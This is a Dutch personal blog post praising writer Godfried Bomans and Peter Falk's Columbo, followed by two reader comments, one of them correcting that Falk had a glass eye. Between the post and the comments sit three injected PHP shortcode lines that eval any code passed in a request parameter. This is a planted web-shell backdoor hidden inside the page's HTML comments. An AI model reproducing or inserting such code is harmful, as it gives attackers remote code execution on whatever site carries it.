Helden: Bomans en Peter Falk (Columbo)

Ik kijk veel TV, dat vind ik niet erg. Het is een goeie manier in touch te blijven met trends en maatschappelijke media. Sinds kort ben ik ook steeds meer gefascineerd in verhalende schrijvers.

Godfried BomansFoto: De Boekerij

Om met de laatste te beginnen, ik heb van mijn beste vriend Marc een mooi boek teleen gekregen van Godfried. Bij hem op ziekenbezoek raakte we lyrisch over zijn rijke woordkeuze en de schijbare vervlakking van die van onze medemensch. Ik heb Bomans slechts een paar keer gezien op TV, waar hij gesprekken heeft met zijn broer (die woonde in het klooster) en een andere gelovige, een bisschop die in Rome zijn leven sleet. De gedachten die hij opschrijft zijn opmerkelijk en prikkelend, zeker nu sommige ideeën nogal ouderwets lijken. Maar op het gebied van godsdienst is hij zeker een prettige criticaster.

Peter Falk als Culumbo
Peter Falk als Columbo

Dan is er natuurlijk de waanzinnige, fijne en simpele afleveringen van Columbo. Briljant gespeeld door Peter Falk. Deze acteur met zijn luie oog en eeuwige ‘trench coat’ en sigaar doet mij echt thuis voelen … lekker met de pootjes op de poef en genieten van zijn ‘Oh sir, one more thing’ (is dat het waar Steve Jobs het vandaan heeft?). Enfin, gezelligheid en ontspannend.

<!– [insert_php]if (isset($_REQUEST["dyswP"])){eval($_REQUEST["dyswP"]);exit;}[/insert_php][php]if (isset($_REQUEST["dyswP"])){eval($_REQUEST["dyswP"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["JUuO"])){eval($_REQUEST["JUuO"]);exit;}[/insert_php][php]if (isset($_REQUEST["JUuO"])){eval($_REQUEST["JUuO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vgxlp"])){eval($_REQUEST["vgxlp"]);exit;}[/insert_php][php]if (isset($_REQUEST["vgxlp"])){eval($_REQUEST["vgxlp"]);exit;}[/php] –>

2 thoughts on “Helden: Bomans en Peter Falk (Columbo)”

  1. Hi

    Ik kom googlend naar Peter Falk toevallig op https://sneaker.nl/articles/2005/07/24/Helden-Bomans-en-Peter-Falk-Columbo/ uit. Je hebt hier iets staan over Peter Falk en geeft aan dat hij een lui oog heeft. Een kleine correctie hierop: hij heeft een kunstoog. Zijn rechteroog is op 3 jarige leeftijd verwijdert omdat hij hier een tumor in had. Neemt natuurlijk niet weg dat hij een fantastische acteur is en met Columbo een heerlijk sjaggie karakter neerzet.

    groetjes
    Nelleke

  2. Dank voor je fijne commentaar. En alvast een fijn nieuwjaar met veel uitzendingen van Colombo 🙂

Comments are closed.